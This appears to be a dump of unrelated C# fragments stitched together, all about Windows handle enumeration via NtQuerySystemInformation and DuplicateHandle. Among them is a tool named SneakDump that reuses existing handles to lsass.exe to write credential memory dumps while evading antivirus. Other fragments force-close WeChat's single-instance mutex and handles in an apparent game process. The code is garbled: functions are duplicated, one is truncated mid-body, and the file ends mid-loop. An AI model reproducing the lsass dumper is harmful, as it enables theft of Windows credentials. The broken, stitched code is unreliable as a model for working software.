private static List<SYSTEM_HANDLE_INFORMATION> GetHandles(Process process)
{
uint nStatus;
int nHandleInfoSize = 0x10000;
IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
int nLength = 0;
IntPtr ipHandle = IntPtr.Zero;
while ((nStatus = NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
byte[] baTemp = new byte[nLength];
CopyMemory(baTemp, ipHandlePointer, (uint)nLength);
long lHandleCount = 0;
if (Is64Bits())
{
lHandleCount = Marshal.ReadInt64(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
SYSTEM_HANDLE_INFORMATION shHandle;
List<SYSTEM_HANDLE_INFORMATION> lstHandles = new List<SYSTEM_HANDLE_INFORMATION>();
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
shHandle = new SYSTEM_HANDLE_INFORMATION();
if (Is64Bits())
{
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (shHandle.ProcessID != process.Id) continue;
lstHandles.Add(shHandle);
}
return lstHandles;
}
public static void FindAndCloseWeChatMutexHandle(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process)
{
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
try
{
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, process.Id);
// 通过 DuplicateHandle 访问句柄
if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return;
}
int nLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024);
// 查询句柄名称
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (nLength == 0)
{
Console.WriteLine("Length returned at zero!");
return;
}
hObjectName = Marshal.AllocHGlobal(nLength);
}
OBJECT_NAME_INFORMATION objObjectName = new OBJECT_NAME_INFORMATION();
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(hObjectName, objObjectName.GetType());
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
Console.WriteLine(strObjectName);
// \Sessions\1\BaseNamedObjects\_WeChat_App_Instance_Identity_Mutex_Name
if (strObjectName.Contains("_Instance_Identity_Mutex_Name"))
{
// 通过 DuplicateHandle DUPLICATE_CLOSE_SOURCE 关闭句柄
IntPtr mHandle = IntPtr.Zero;
if (DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out mHandle, 0, false, DUPLICATE_CLOSE_SOURCE))
{
CloseHandle(mHandle);
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
Marshal.FreeHGlobal(hObjectName);
CloseHandle(ipHandle);
CloseHandle(openProcessHandle);
}
}
public static string getFileByProcessHandle(SYSTEM_HANDLE_INFORMATION handleInfo, IntPtr hProcess)
{
try
{
IntPtr thisProcess = Process.GetCurrentProcess().Handle;
IntPtr handle;
//duplicate the handle
DuplicateHandle(hProcess, new IntPtr(handleInfo.HandleValue), thisProcess, out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS);
//setup bufffer to store unicode string
int bufferSize = 0x200; //512 bytes
//Allocate unmanaged memory to store name
IntPtr pFileNameBuffer = Marshal.AllocHGlobal(bufferSize);
IO_STATUS_BLOCK ioStat = new IO_STATUS_BLOCK();
NtQueryInformationFile(handle, ref ioStat, pFileNameBuffer, bufferSize, FILE_INFORMATION_CLASS.FileNameInformation);
//close the handle
CloseHandle(handle); //always do this when duplicating handles
// offset = 4
int offset = 4;
long pBaseAddress = pFileNameBuffer.ToInt64();
}
}
/// <summary>
/// Queries for name of handle.
/// </summary>
/// <param name="targetHandleInfo">The handle info.</param>
/// <param name="hProcess">Open handle to the process which owns that handle.</param>
/// <returns></returns>
private static string GetHandleName(SYSTEM_HANDLE_INFORMATION targetHandleInfo, IntPtr hProcess)
{
//skip special NamedPipe handle (this may cause hang up with NtQueryObject function)
if (targetHandleInfo.AccessMask.ToInt64() == 0x0012019F)
{
return(String.Empty);
}
IntPtr thisProcess = Process.GetCurrentProcess().Handle;
IntPtr handle;
// Need to duplicate handle in this process to be able to access name
DuplicateHandle(hProcess, new IntPtr(targetHandleInfo.HandleValue), thisProcess,
out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS);
// Setup buffer to store unicode string
int bufferSize = GetHandleNameLength(handle);
// Allocate unmanaged memory to store name
IntPtr pStringBuffer = Marshal.AllocHGlobal(bufferSize);
// Query to fill string buffer with name
NtQueryObject(handle, OBJECT_INFORMATION_CLASS.ObjectNameInformation, pStringBuffer, bufferSize, out bufferSize);
// Close this handle
CloseHandle(handle); //super important... almost missed this
// Do the conversion to managed type
string handleName = ConvertToString(pStringBuffer);
// Release
Marshal.FreeHGlobal(pStringBuffer);
return(handleName);
}
public static void DumpLsass(SYSTEM_HANDLE_INFORMATION handleInfo, string FileName)
{
// Code for getting handles was found here https://stackoverflow.com/questions/54872228/c-sharp-how-to-find-all-handles-associated-with-current-process
// idea for getting existing handles to dump lsass found here https://skelsec.medium.com/duping-av-with-handles-537ef985eb03
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, (int)handleInfo.ProcessID);
bool test = DuplicateHandle(openProcessHandle, new IntPtr(handleInfo.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS);
int pLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024);
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectTypeInformation, hObjectName, pLength, ref pLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (pLength == 0)
{
Console.WriteLine("Length returned at zero!");
}
hObjectName = Marshal.AllocHGlobal(pLength);
}
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName);
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
if (strObjectName == "Process")
{
int max = 1024;
StringBuilder str = new StringBuilder(max);
QueryFullProcessImageName(ipHandle, 0, str, ref max);
if (str.ToString().Contains("lsass.exe"))
{
Console.WriteLine("[+] Found open handle to lass: " + ipHandle);
FileStream dumpFile = new FileStream(FileName, FileMode.Create);
Console.WriteLine("[+] Attempting to dump lsass with handle...");
bool dumped = MiniDumpWriteDump(ipHandle, handleInfo.ProcessID, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
dumpFile.Close();
if (dumped == true)
{
Console.WriteLine("[+] Dumped lsass");
System.Environment.Exit(1);
}
}
}
}
}
private static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process)
{
uint nStatus;
int nHandleInfoSize = 0x10000;
IntPtr ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
int nLength = 0;
IntPtr ipHandle = IntPtr.Zero;
while ((nStatus = NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ipHandlePointer, nHandleInfoSize, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
byte[] baTemp = new byte[nLength];
CopyMemory(baTemp, ipHandlePointer, (uint)nLength);
long lHandleCount = 0;
if (Is64Bits())
{
lHandleCount = Marshal.ReadInt64(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
SYSTEM_HANDLE_INFORMATION shHandle;
List <SYSTEM_HANDLE_INFORMATION> lstHandles = new List <SYSTEM_HANDLE_INFORMATION>();
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
shHandle = new SYSTEM_HANDLE_INFORMATION();
if (Is64Bits())
{
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (shHandle.ProcessID != process.Id)
{
continue;
}
lstHandles.Add(shHandle);
}
return(lstHandles);
}
public static string GetObjectTypeName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
IntPtr m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id);
var objBasic = new OBJECT_BASIC_INFORMATION();
var objObjectType = new OBJECT_TYPE_INFORMATION();
int nLength = 0;
if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle,
GetCurrentProcess(), out IntPtr ipHandle,
0, false, 0x2))
{
return(null);
}
IntPtr ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
IntPtr ipObjectType = Marshal.AllocHGlobal(objBasic.TypeInformationLength);
nLength = objBasic.TypeInformationLength;
while ((uint)(_ = NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectTypeInformation, ipObjectType,
nLength, ref nLength)) ==
0xC0000004)
{
Marshal.FreeHGlobal(ipObjectType);
ipObjectType = Marshal.AllocHGlobal(nLength);
}
objObjectType = (OBJECT_TYPE_INFORMATION)Marshal.PtrToStructure(ipObjectType, objObjectType.GetType());
IntPtr ipTemp;
if (Is64Bits())
{
ipTemp = new IntPtr(Convert.ToInt64(objObjectType.Name.Buffer.ToString(), 10) >> 32);
}
else
{
ipTemp = objObjectType.Name.Buffer;
}
string strObjectTypeName = Marshal.PtrToStringUni(ipTemp, objObjectType.Name.Length >> 1);
Marshal.FreeHGlobal(ipObjectType);
return(strObjectTypeName);
}
private static IEnumerable <SYSTEM_HANDLE_INFORMATION> GetHandles()
{
List <SYSTEM_HANDLE_INFORMATION> aHandles = new List <SYSTEM_HANDLE_INFORMATION>();
int handle_info_size = Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()) * 20000; //Allocate enough memory to hold 200000 handles
IntPtr ptrHandleData = IntPtr.Zero;
try
{
ptrHandleData = Marshal.AllocHGlobal(handle_info_size);
int nLength = 0;
//Keep testing handle info lengths until you find out how much memory to allocate to hold all handles
while (NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ptrHandleData, handle_info_size, ref nLength) == STATUS_INFO_LENGTH_MISMATCH)
{
handle_info_size = nLength;
Marshal.FreeHGlobal(ptrHandleData);
ptrHandleData = Marshal.AllocHGlobal(nLength);
}
//Now that we know how much data to store, actually store the data
long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64();
IntPtr ptrHandleItem = ptrHandleData + Marshal.SizeOf(ptrHandleData);
//Go through all the handles to extract individual information for each
for (long lIndex = 0; lIndex < handle_count; lIndex++)
{
//Put the information for a handle into the struct SYSTEM_HANDLE_INFORMATION
SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = Marshal.PtrToStructure <SYSTEM_HANDLE_INFORMATION>(ptrHandleItem);
//Move to next handle
ptrHandleItem += Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION());
//Only care about this if you want to filter handles releveant to a specific process ID //if (oSystemHandleInfo.ProcessID != 8988) { continue; }
//Add the handle info to the list of handles
aHandles.Add(oSystemHandleInfo);
}
}
catch (Exception ex)
{
throw ex;
}
finally
{
//Avoid memory leaks by freeing up managed memory
Marshal.FreeHGlobal(ptrHandleData);
}
return(aHandles);
}
private static string GetFilePath(SYSTEM_HANDLE_INFORMATION systemHandleInformation, Process process)
{
IntPtr ipHandle = IntPtr.Zero;
IntPtr openProcessHandle = IntPtr.Zero;
IntPtr hObjectName = IntPtr.Zero;
try
{
PROCESS_ACCESS_FLAGS flags = PROCESS_ACCESS_FLAGS.DupHandle | PROCESS_ACCESS_FLAGS.VMRead;
openProcessHandle = OpenProcess(flags, false, process.Id);
if (!DuplicateHandle(openProcessHandle, new IntPtr(systemHandleInformation.Handle), GetCurrentProcess(), out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
if (GetFileType(ipHandle) != FileType.FileTypeDisk)
{
return(null);
}
int nLength = 0;
hObjectName = Marshal.AllocHGlobal(256 * 1024);
while ((uint)(NtQueryObject(ipHandle, (int)OBJECT_INFORMATION_CLASS.ObjectNameInformation, hObjectName, nLength, ref nLength)) == STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(hObjectName);
if (nLength == 0)
{
Console.WriteLine("Length returned at zero!");
return(null);
}
hObjectName = Marshal.AllocHGlobal(nLength);
}
OBJECT_NAME_INFORMATION objObjectName = Marshal.PtrToStructure <OBJECT_NAME_INFORMATION>(hObjectName);
if (objObjectName.Name.Buffer != IntPtr.Zero)
{
string strObjectName = Marshal.PtrToStringUni(objObjectName.Name.Buffer);
return(GetRegularFileNameFromDevice(strObjectName));
}
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
finally
{
Marshal.FreeHGlobal(hObjectName);
CloseHandle(ipHandle);
CloseHandle(openProcessHandle);
}
return(null);
}
public static string getObjectTypeName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
var m_ipProcessHwnd = Native.OpenProcess((int)ProcessAccessFlags.All, false, process.Id);
var ipHandle = IntPtr.Zero;
var objBasic = new OBJECT_BASIC_INFORMATION();
var ipBasic = IntPtr.Zero;
var objObjectType = new OBJECT_TYPE_INFORMATION();
var ipObjectType = IntPtr.Zero;
var ipObjectName = IntPtr.Zero;
var strObjectTypeName = "";
var nLength = 0;
var nReturn = 0;
var ipTemp = IntPtr.Zero;
if (!Native.DuplicateHandle(m_ipProcessHwnd, shHandle.Handle,
Native.GetCurrentProcess(), out ipHandle,
0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
Native.NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
ipObjectType = Marshal.AllocHGlobal(objBasic.TypeInformationLength);
nLength = objBasic.TypeInformationLength;
while ((uint)(nReturn = Native.NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectTypeInformation, ipObjectType,
nLength, ref nLength)) ==
STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(ipObjectType);
ipObjectType = Marshal.AllocHGlobal(nLength);
}
objObjectType = (OBJECT_TYPE_INFORMATION)Marshal.PtrToStructure(ipObjectType, objObjectType.GetType());
ipTemp = Is64Bits() ? new IntPtr(Convert.ToInt64(objObjectType.Name.Buffer.ToString(), 10) >> 32) : objObjectType.Name.Buffer;
strObjectTypeName = Marshal.PtrToStringUni(ipTemp, objObjectType.Name.Length >> 1);
Marshal.FreeHGlobal(ipObjectType);
return(strObjectTypeName);
}
/// <summary>
/// Queries for file name associated with handle.
/// </summary>
/// <param name="handleInfo">The handle info.</param>
/// <param name="hProcess">Open handle to the process which owns that handle.</param>
/// <returns></returns>
private static string GetFileName(SYSTEM_HANDLE_INFORMATION handleInfo, IntPtr hProcess)
{
try
{
IntPtr thisProcess = Process.GetCurrentProcess().Handle;
IntPtr handle;
// Need to duplicate handle in this process to be able to access name
DuplicateHandle(hProcess, new IntPtr(handleInfo.HandleValue), thisProcess,
out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS);
// Setup buffer to store unicode string
int bufferSize = 0x200; //512 bytes
// Allocate unmanaged memory to store name
IntPtr pFileNameBuffer = Marshal.AllocHGlobal(bufferSize);
IO_STATUS_BLOCK ioStat = new IO_STATUS_BLOCK();
NtQueryInformationFile(handle, ref ioStat, pFileNameBuffer, bufferSize, FILE_INFORMATION_CLASS.FileNameInformation);
// Close this handle
CloseHandle(handle); //super important... almost missed this
// offset=4 seems to work...
int offset = 4;
long pBaseAddress = pFileNameBuffer.ToInt64();
// Do the conversion to managed type
string fileName = Marshal.PtrToStringUni(new IntPtr(pBaseAddress + offset));
// Release
Marshal.FreeHGlobal(pFileNameBuffer);
return(fileName);
}
catch (Exception e) // logged
{
Log.Error($"Unable to retrieve filename from process.", e);
// is it really a good thing to return an empty string here
// when the operation we just did failed? Why not letting
// the user process handle the exception? Just saying...
return(string.Empty);
}
}
public static List <SYSTEM_HANDLE_INFORMATION> GetHandles(Process process)
{
List <SYSTEM_HANDLE_INFORMATION> aHandles = new List <SYSTEM_HANDLE_INFORMATION>();
int handle_info_size = Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()) * 20000;
IntPtr ptrHandleData = IntPtr.Zero;
try
{
ptrHandleData = Marshal.AllocHGlobal(handle_info_size);
int nLength = 0;
while (NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ptrHandleData, handle_info_size, ref nLength) == STATUS_INFO_LENGTH_MISMATCH)
{
handle_info_size = nLength;
Marshal.FreeHGlobal(ptrHandleData);
ptrHandleData = Marshal.AllocHGlobal(nLength);
}
long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64();
IntPtr ptrHandleItem = ptrHandleData + Marshal.SizeOf(ptrHandleData);
for (long lIndex = 0; lIndex < handle_count; lIndex++)
{
SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = new SYSTEM_HANDLE_INFORMATION();
oSystemHandleInfo = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ptrHandleItem, oSystemHandleInfo.GetType());
ptrHandleItem += Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION());
if (oSystemHandleInfo.ProcessID != process.Id)
{
continue;
}
aHandles.Add(oSystemHandleInfo);
}
}
catch (Exception ex)
{
throw ex;
}
finally
{
Marshal.FreeHGlobal(ptrHandleData);
}
return(aHandles);
}
public static void Main(string[] args)
{
if (args.Length < 1)
{
Console.WriteLine("USAGE: SneakDump.exe <path to dump file>");
System.Environment.Exit(0);
}
string FileName = args[0];
int outPriv = 0;
List <SYSTEM_HANDLE_INFORMATION> aHandles = new List <SYSTEM_HANDLE_INFORMATION>();
int handle_info_size = Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION()) * 20000;
IntPtr ptrHandleData = IntPtr.Zero;
List <IntPtr> lsassHandles = new List <IntPtr>();
//try
//{
ptrHandleData = Marshal.AllocHGlobal(handle_info_size);
int nLength = 0;
while (NtQuerySystemInformation(CNST_SYSTEM_HANDLE_INFORMATION, ptrHandleData, handle_info_size, ref nLength) == STATUS_INFO_LENGTH_MISMATCH)
{
handle_info_size = nLength;
Marshal.FreeHGlobal(ptrHandleData);
ptrHandleData = Marshal.AllocHGlobal(nLength);
}
long handle_count = Marshal.ReadIntPtr(ptrHandleData).ToInt64();
IntPtr ptrHandleItem = ptrHandleData + Marshal.SizeOf(ptrHandleData);
for (long lIndex = 0; lIndex < handle_count; lIndex++)
{
SYSTEM_HANDLE_INFORMATION oSystemHandleInfo = Marshal.PtrToStructure <SYSTEM_HANDLE_INFORMATION>(ptrHandleItem);
ptrHandleItem += Marshal.SizeOf(new SYSTEM_HANDLE_INFORMATION());
if (oSystemHandleInfo.ProcessID == 4)
{
continue;
}
DumpLsass(oSystemHandleInfo, FileName);
}
}
/// <summary>
/// Queries for file name associated with handle.
/// </summary>
/// <param name="handleInfo">The handle info.</param>
/// <param name="hProcess">Open handle to the process which owns that handle.</param>
/// <returns></returns>
private static string GetFileName(SYSTEM_HANDLE_INFORMATION handleInfo, IntPtr hProcess)
{
try
{
IntPtr thisProcess = Process.GetCurrentProcess().Handle;
IntPtr handle;
// Need to duplicate handle in this process to be able to access name
DuplicateHandle(hProcess, new IntPtr(handleInfo.HandleValue), thisProcess,
out handle, 0, false, DuplicateOptions.DUPLICATE_SAME_ACCESS);
// Setup buffer to store unicode string
int bufferSize = 0x200; //512 bytes
// Allocate unmanaged memory to store name
IntPtr pFileNameBuffer = Marshal.AllocHGlobal(bufferSize);
IO_STATUS_BLOCK ioStat = new IO_STATUS_BLOCK();
NtQueryInformationFile(handle, ref ioStat, pFileNameBuffer, bufferSize, FILE_INFORMATION_CLASS.FileNameInformation);
// Close this handle
CloseHandle(handle); //super important... almost missed this
// offset=4 seems to work...
int offset = 4;
long pBaseAddress = pFileNameBuffer.ToInt64();
// Do the conversion to managed type
string fileName = Marshal.PtrToStringUni(new IntPtr(pBaseAddress + offset));
// Release
Marshal.FreeHGlobal(pFileNameBuffer);
return fileName;
}
catch (Exception)
{
return string.Empty;
}
}
public static void CloseHandles()
{
var processes = Process.GetProcessesByName("cg_se_3000");
var nHandleInfoSize = 0x10000;
var ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
var nLength = 0;
var ipHandle = IntPtr.Zero;
while (NtQuerySystemInformation(16, ipHandlePointer,
nHandleInfoSize, ref nLength) ==
0xc0000004)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
var baTemp = new byte[nLength];
Marshal.Copy(ipHandlePointer, baTemp, 0, nLength);
long lHandleCount = 0;
if (Is64Bits())
{
lHandleCount = Marshal.ReadInt64(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
var shHandle = new SYSTEM_HANDLE_INFORMATION();
if (Is64Bits())
{
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle) + 8);
}
else
{
ipHandle = new IntPtr(ipHandle.ToInt64() + Marshal.SizeOf(shHandle));
shHandle = (SYSTEM_HANDLE_INFORMATION)Marshal.PtrToStructure(ipHandle, shHandle.GetType());
}
if (shHandle.ObjectTypeNumber != 17)
{
continue;
}
var process = processes.FirstOrDefault(p => p.Id == shHandle.ProcessID);
if (process == null)
{
continue;
}
var name = GetObjectName(shHandle, process);
if (name != null && name.Contains("LREso"))
{
Console.WriteLine(@"Close " + name);
DuplicateHandle(process.Handle, shHandle.Handle, IntPtr.Zero, out var h, 0, false, DUPLICATE_CLOSE_SOURCE);
CloseHandle(h);
}
}
}
public static string GetObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
IntPtr m_ipProcessHwnd = OpenProcess(ProcessAccessFlags.All, false, process.Id);
IntPtr ipHandle = IntPtr.Zero;
var objBasic = new OBJECT_BASIC_INFORMATION();
IntPtr ipBasic = IntPtr.Zero;
var objObjectName = new OBJECT_NAME_INFORMATION();
IntPtr ipObjectName = IntPtr.Zero;
string strObjectName = "";
int nLength = 0;
int nReturn = 0;
IntPtr ipTemp = IntPtr.Zero;
if (!DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, GetCurrentProcess(),
out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
nLength = objBasic.NameInformationLength;
ipObjectName = Marshal.AllocHGlobal(nLength);
while ((uint)(nReturn = NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectNameInformation,
ipObjectName, nLength, ref nLength))
== STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(ipObjectName);
ipObjectName = Marshal.AllocHGlobal(nLength);
}
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType());
if (Is64Bits())
{
ipTemp = ipObjectName + 16;
}
else
{
ipTemp = objObjectName.Name.Buffer;
}
if (ipTemp != IntPtr.Zero)
{
var baTemp2 = new byte[nLength];
try
{
Marshal.Copy(ipTemp, baTemp2, 0, nLength);
strObjectName = Marshal.PtrToStringUni(ipTemp);
//strObjectName = Encoding.Unicode.GetString (baTemp2);
return(strObjectName);
}
catch (AccessViolationException)
{
return(null);
}
finally
{
Marshal.FreeHGlobal(ipObjectName);
CloseHandle(ipHandle);
}
}
return(null);
}
public static string getObjectName(SYSTEM_HANDLE_INFORMATION shHandle, Process process)
{
var m_ipProcessHwnd = Native.OpenProcess((int)ProcessAccessFlags.All, false, process.Id);
var ipHandle = IntPtr.Zero;
var objBasic = new OBJECT_BASIC_INFORMATION();
var ipBasic = IntPtr.Zero;
var ipObjectType = IntPtr.Zero;
var objObjectName = new OBJECT_NAME_INFORMATION();
var ipObjectName = IntPtr.Zero;
var nLength = 0;
var nReturn = 0;
var ipTemp = IntPtr.Zero;
if (!Native.DuplicateHandle(m_ipProcessHwnd, shHandle.Handle, Native.GetCurrentProcess(),
out ipHandle, 0, false, DUPLICATE_SAME_ACCESS))
{
return(null);
}
ipBasic = Marshal.AllocHGlobal(Marshal.SizeOf(objBasic));
Native.NtQueryObject(ipHandle, (int)ObjectInformationClass.ObjectBasicInformation,
ipBasic, Marshal.SizeOf(objBasic), ref nLength);
objBasic = (OBJECT_BASIC_INFORMATION)Marshal.PtrToStructure(ipBasic, objBasic.GetType());
Marshal.FreeHGlobal(ipBasic);
nLength = objBasic.NameInformationLength;
ipObjectName = Marshal.AllocHGlobal(nLength);
while ((uint)(nReturn = Native.NtQueryObject(
ipHandle, (int)ObjectInformationClass.ObjectNameInformation,
ipObjectName, nLength, ref nLength))
== STATUS_INFO_LENGTH_MISMATCH)
{
Marshal.FreeHGlobal(ipObjectName);
ipObjectName = Marshal.AllocHGlobal(nLength);
}
objObjectName = (OBJECT_NAME_INFORMATION)Marshal.PtrToStructure(ipObjectName, objObjectName.GetType());
ipTemp = Is64Bits() ? new IntPtr(Convert.ToInt64(objObjectName.Name.Buffer.ToString(), 10) >> 32) : objObjectName.Name.Buffer;
if (ipTemp != IntPtr.Zero)
{
var baTemp2 = new byte[nLength];
try
{
Marshal.Copy(ipTemp, baTemp2, 0, nLength);
var strObjectName = Marshal.PtrToStringUni(Is64Bits() ? new IntPtr(ipTemp.ToInt64()) : new IntPtr(ipTemp.ToInt32()));
return(strObjectName);
}
catch (AccessViolationException)
{
Console.WriteLine("[WARNING] Access violation!");
return(null);
}
finally
{
Marshal.FreeHGlobal(ipObjectName);
Native.CloseHandle(ipHandle);
}
}
return(null);
}
public NhaamaHandle[] GetHandles()
{
var handles = new List <NhaamaHandle>();
var nHandleInfoSize = 0x10000;
var ipHandlePointer = Marshal.AllocHGlobal(nHandleInfoSize);
var nLength = 0;
IntPtr ipHandle;
while ((NtDll.NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS.SystemHandleInformation, ipHandlePointer, nHandleInfoSize, ref nLength)) == NtStatus.InfoLengthMismatch)
{
nHandleInfoSize = nLength;
Marshal.FreeHGlobal(ipHandlePointer);
ipHandlePointer = Marshal.AllocHGlobal(nLength);
}
byte[] baTemp = new byte[nLength];
Marshal.Copy(ipHandlePointer, baTemp, 0, nLength);
long lHandleCount;
if (Is64BitProcess())
{
lHandleCount = Marshal.ReadInt64(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt64() + 8);
}
else
{
lHandleCount = Marshal.ReadInt32(ipHandlePointer);
ipHandle = new IntPtr(ipHandlePointer.ToInt32() + 4);
}
SYSTEM_HANDLE_INFORMATION shHandle;
List <SYSTEM_HANDLE_INFORMATION> test = new List <SYSTEM_HANDLE_INFORMATION>();
for (long lIndex = 0; lIndex < lHandleCount; lIndex++)
{
shHandle = new SYSTEM_HANDLE_INFORMATION();
if (Is64BitProcess())
{
